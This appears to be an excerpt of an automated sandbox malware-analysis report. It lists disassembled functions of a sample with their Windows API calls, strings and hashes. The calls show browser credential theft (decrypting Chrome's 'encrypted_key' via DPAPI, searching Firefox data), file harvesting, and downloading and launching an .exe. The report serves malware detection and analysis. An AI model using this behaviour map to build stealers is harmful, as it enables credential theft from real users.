                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 211194620-0
                                                                                                                  • Opcode ID: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                  • Instruction ID: f50e13fd7eda3401684194e3b4178dcbc35dad14aaafdb4021fb065c0cc55dd5
                                                                                                                  • Opcode Fuzzy Hash: 9e3b5aa9e4815655d37b580d824bd8f900de3d495d383a8751fe16bf523792ad
                                                                                                                  • Instruction Fuzzy Hash: 6F714072A00119ABCF01FFA5EE468CD7775EF14309F104036F500B71A2DBB9AE898B99
                                                                                                                  Function 0040D40E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 125stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                  • StrStrA.SHLWAPI(00000000,?,00437538,0043688A), ref: 0040D49F
                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040D4B2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                                                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                                                  • API String ID: 161838763-3310892237
                                                                                                                  • Opcode ID: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                  • Instruction ID: 85de75ec200c89e9111d7c6d064248f53d90c55406061a5cb20e0ca06024b096
                                                                                                                  • Opcode Fuzzy Hash: 6aa37cb2f67db944989395a71283edee486ac6c96c9a46fa9e3a19fa612f2b1c
                                                                                                                  • Instruction Fuzzy Hash: 15410B76A001199BCF10FBA6DD465CD77B5AF04308F51003AFD00B3192DBB8AE4D8AE9
                                                                                                                  Function 0040819F Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                                    • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                                    • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                                    • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                                    • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                                    • Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37
                                                                                                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,0040CC90,?,?), ref: 004081E5
                                                                                                                    • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                                    • Part of subcall function 00408048: LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                                    • Part of subcall function 00408048: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                                    • Part of subcall function 00408048: LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                                    • Part of subcall function 004080A1: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040823B), ref: 004080C4
                                                                                                                    • Part of subcall function 004080A1: LocalAlloc.KERNEL32(00000040,0040823B,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080D8
                                                                                                                    • Part of subcall function 004080A1: LocalFree.KERNEL32(0040CB95,?,?,0040823B,0040CB95,?,?,?,?,?,?,?,0040CC90,?,?), ref: 004080FD
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: Local$Alloc$CryptFile$BinaryFreeString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                                                                                                  • String ID: $"encrypted_key":"$DPAPI
                                                                                                                  • API String ID: 2311102621-738592651
                                                                                                                  • Opcode ID: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                  • Instruction ID: d78dfd73ee8100a23edce15a91f2c70fa2f38e8288fa49592993377d3a11e596
                                                                                                                  • Opcode Fuzzy Hash: 90210c10ee996d7ab5569050e076cca1abac48211b6b88e599488f63d6b1df73
                                                                                                                  • Instruction Fuzzy Hash: 1121C232E40209ABDF14EB91DD41ADE7378AF41364F2045BFE950B72D1DF38AA49CA58
                                                                                                                  Function 00412BF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124processCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00405237: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                    • Part of subcall function 00405237: RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                    • Part of subcall function 00405237: InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                    • Part of subcall function 00405237: StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                    • Part of subcall function 00405237: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                    • Part of subcall function 00405237: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                    • Part of subcall function 00405237: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                    • Part of subcall function 00405237: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                    • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                    • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                    • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                    • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                    • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                    • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                    • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                    • Part of subcall function 00412446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                  • _memset.LIBCMT ref: 00412CDF
                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00436710), ref: 00412D31
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTime_memsetlstrlen
                                                                                                                  • String ID: .exe
                                                                                                                  • API String ID: 2831197775-4119554291
                                                                                                                  • Opcode ID: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
                                                                                                                  • Instruction ID: b22801d522c47b455a3bf9a13fec4127fa4a3e5ad37381d5e28ead6c554ce160
                                                                                                                  • Opcode Fuzzy Hash: dca4419b34fce0c28ab30abb3e60bf27d84a7dc54cda20d1bfd4b76e486b6db5
                                                                                                                  • Instruction Fuzzy Hash: 87418472E00109BBDF11FBA6ED42ACE7375AF44308F110076F500B7191D6B86E8A8BD9
                                                                                                                  Function 00416330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00411DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00411DFD
                                                                                                                  • lstrcatA.KERNEL32(?,00000000,?,00000000,?), ref: 00416378
                                                                                                                  • lstrcatA.KERNEL32(?), ref: 00416396
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416018
                                                                                                                    • Part of subcall function 00415FD1: FindFirstFileA.KERNEL32(?,?), ref: 0041602F
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
                                                                                                                    • Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
                                                                                                                    • Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
                                                                                                                    • Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170
                                                                                                                    • Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
                                                                                                                    • Part of subcall function 00415FD1: CopyFileA.KERNEL32(?,?,00000001), ref: 00416229
                                                                                                                    • Part of subcall function 00415FD1: DeleteFileA.KERNEL32(?), ref: 0041629D
                                                                                                                    • Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
                                                                                                                    • Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                                                                                  • String ID: nzA
                                                                                                                  • API String ID: 2104210347-1761861442
                                                                                                                  • Opcode ID: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                  • Instruction ID: 6a45041e7e61eaec4ac0428956384e3812b0c56a5955d947ae57416d2cc1f0af
                                                                                                                  • Opcode Fuzzy Hash: b4da720962e9555cdd77b7fe306ab90caf7c41af40743b1f06eb89ecc5cf0673
                                                                                                                  • Instruction Fuzzy Hash: DD31F77280010DEFDF15EB60DC43EE8377AEB08314F5440AEF606932A1EA769B919F55
                                                                                                                  Function 0041683E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                    • Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
                                                                                                                    • Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
                                                                                                                    • Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
                                                                                                                    • Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
                                                                                                                    • Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
                                                                                                                    • Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
                                                                                                                    • Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC
                                                                                                                  • StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: HttpInternet$OpenRequest$ConnectInfoOptionQuerySendlstrcpy
                                                                                                                  • String ID: ERROR$ERROR
                                                                                                                  • API String ID: 3086566538-2579291623
                                                                                                                  • Opcode ID: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                  • Instruction ID: fa6cd13a443083575c3a824eeb1e5676c961334a8f4b47820412c2fdc9a040c1
                                                                                                                  • Opcode Fuzzy Hash: 1f04a280a058e3c99f689a2c33220ef0c6b47f7de1e09031bce4c6852948f489
                                                                                                                  • Instruction Fuzzy Hash: 6F014F75A00118ABCB20FB76D9469CD73A96F04308F55417BBC24E3293E7B8E9494AD9
                                                                                                                  Function 00416E97 Relevance: 4.6, APIs: 3, Instructions: 70sleepsynchronizationthreadCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • Sleep.KERNEL32(000003E8,?,?), ref: 00416EFE
                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateObjectSingleSleepThreadWait
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4198075804-0
                                                                                                                  • Opcode ID: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                  • Instruction ID: 5b264aedade7dddb2649676fe5ff4aca135c6ea40ecc08e40dc523016e9b5da3
                                                                                                                  • Opcode Fuzzy Hash: a1dc13e99dd204c5a3461b4ea6d28ee21b2c0be54f1f4843eeff7d6218642cdc
                                                                                                                  • Instruction Fuzzy Hash: EC213B72900218ABCF14EF96E9459DE7BB9FF40358F11512BF904A3151D738EA86CF98
                                                                                                                  Function 00412446 Relevance: 4.5, APIs: 3, Instructions: 41fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00414A8D), ref: 00412460
                                                                                                                  • WriteFile.KERNEL32(00000000,00000000,00414A8D,00414A8D,00000000,?,?,?,00414A8D), ref: 00412487
                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00414A8D), ref: 0041249E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000004.00000002.2453722114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000004.00000002.2453722114.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_4_2_400000_InstallUtil.jbxd
                                                                                                                  Yara matches
                                                                                                                  Similarity
                                                                                                                  • API ID: File$CloseCreateHandleWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1065093856-0
                                                                                                                  • Opcode ID: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                  • Instruction ID: a587d297adf89e60fa6946fdd7da6f666782c0f167f87b21f29bcfda1cd19bad
                                                                                                                  • Opcode Fuzzy Hash: 618600667c8334e05266c7920bfcba6b014638909509334c775888355d968c7c
                                                                                                                  • Instruction Fuzzy Hash: 84F02471200118BFEF01AFA4DD8AFEF379CDF053A8F000022F951D6190D3A58D9157A5
                                                                                                                  Function 6C633060 Relevance: 4.5, APIs: 3, Instructions: 36timeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • ?Startup@TimeStamp@mozilla@@SAXXZ.MOZGLUE ref: 6C633095
                                                                                                                    • Part of subcall function 6C6335A0: InitializeCriticalSectionAndSpinCount.KERNEL32(6C6BF688,00001000), ref: 6C6335D5
